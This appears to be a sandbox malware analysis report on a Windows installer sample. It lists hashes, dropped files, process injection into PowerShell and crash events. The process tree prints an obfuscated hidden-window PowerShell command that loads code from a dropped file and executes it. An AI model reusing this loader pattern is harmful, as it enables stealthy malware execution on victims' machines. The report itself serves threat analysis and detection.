Overview
overview
10Static
static
394d77da6e9...74.exe
windows7-x64
1094d77da6e9...74.exe
windows10-2004-x64
8$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
144s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
18-07-2024 18:26
Static task
static1
Behavioral task
behavioral1
Sample
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240709-en
General
-
Target
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe
-
Size
593KB
-
MD5
6b67c037861d71932f9971faade3c695
-
SHA1
03313a12f94a0923bd456a058bb974e43f3c8562
-
SHA256
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074
-
SHA512
d59c9fe2cb5664394c670ca85964c85fbc4f00129c786ea79470b6c47d9768a5481496a6b9ac38f15c4cc66aad83e372a162a9890359648b19c4c08b9c53728f
-
SSDEEP
12288:sCn4AyHnr1nomoZlKOKIQxRGul47sbYY6UsGVPCHNwEX:/nEnrVvfOdQxJ47skYxsGVcNb
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 4 IoCs
Processes:
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exepid process 1756 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe 1756 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe 1756 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe 1756 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe -
Drops file in Program Files directory 2 IoCs
Processes:
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exedescription ioc process File opened for modification C:\Program Files (x86)\astonied.ini 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe -
Drops file in Windows directory 2 IoCs
Processes:
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exedescription ioc process File opened for modification C:\Windows\Fonts\frasiger.ini 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe File created C:\Windows\resources\sammentrkket\fatherlike.lnk 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1584 2788 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepid process 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2788 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exedescription pid process target process PID 1756 wrote to memory of 2788 1756 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe powershell.exe PID 1756 wrote to memory of 2788 1756 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe powershell.exe PID 1756 wrote to memory of 2788 1756 94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe"C:\Users\Admin\AppData\Local\Temp\94d77da6e9ba6786e66b3864a9092a028d4e076774a5003b50eea0b5b04be074.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$thingumajig=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Cytoplasmiske.Inl';$barbs=$thingumajig.SubString(70747,3);.$barbs($thingumajig)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 22203⤵
- Program crash
PID:1584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2788 -ip 27881⤵PID:3960
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD549998d066af103d06b56f5b4c76b1497
SHA1b7dce166147f40dfa17f5ca950c4e324a10d04be
SHA25695042dbe7428461ee7fd210acf37040eb921012c7b32f66cb54766f0a16bb5b6
SHA51261b0d75ef3a18c8c13ad8c614a012a71cbc4f6fd4bba0aa0c7b866e1a8fbf5f9fdb3e012a3566586d47fc8b456a7de36a06a0d70cdf27e504aac64eab37555d7
-
Filesize
9KB
MD519d3373e403a6e724cfa1563dfd1f463
SHA14917547b355a91e9431879209f56925097bf4fb3
SHA256873fa0c52eae7cfbed56ea18b21fad0ca8f018ab7f305bd1db1a3ec454e353d1
SHA512b6f6db23376ade4bb864ea14244980612f42f322d3915540090bfe8edc80e9577b7aec3589bd587ca47a729371ed8ab8e6e23031bb3e3f524d48783637646193
-
Filesize
6KB
MD56c881f00ba860b17821d8813aa34dbc6
SHA10e5a1e09b1ce1bc758d6977b913a8d9ccbe52a13
SHA256bcb93204bd1854d0c34fa30883bab51f6813ab32abf7fb7d4aeed21d71f6af87
SHA512c78d6f43aa9bb35260a7bd300392ce809282660283fa6cb3059bae50d6db229b0b853cab7c949d4bdf19309fb183257b1c9feb01a66347e1c0adeb21543315b6
-
Filesize
69KB
MD5400299b1901cee5565c7f095ae1da7a0
SHA16f5ef95f16c7657a1147c13f483738efbb97696e
SHA2560c3763bcba10bdcf914aeb773514df59169770ff0e3f3dfcba1ffb9f699a61e4
SHA512d09950fd2a75ad6a7b4a5e101cbad8f411110aa787c06e5750ae42465981786ff978d14ffee328fa88ab4b8adf25afc9511f18f34b42bbdbd186b0ab0cde3855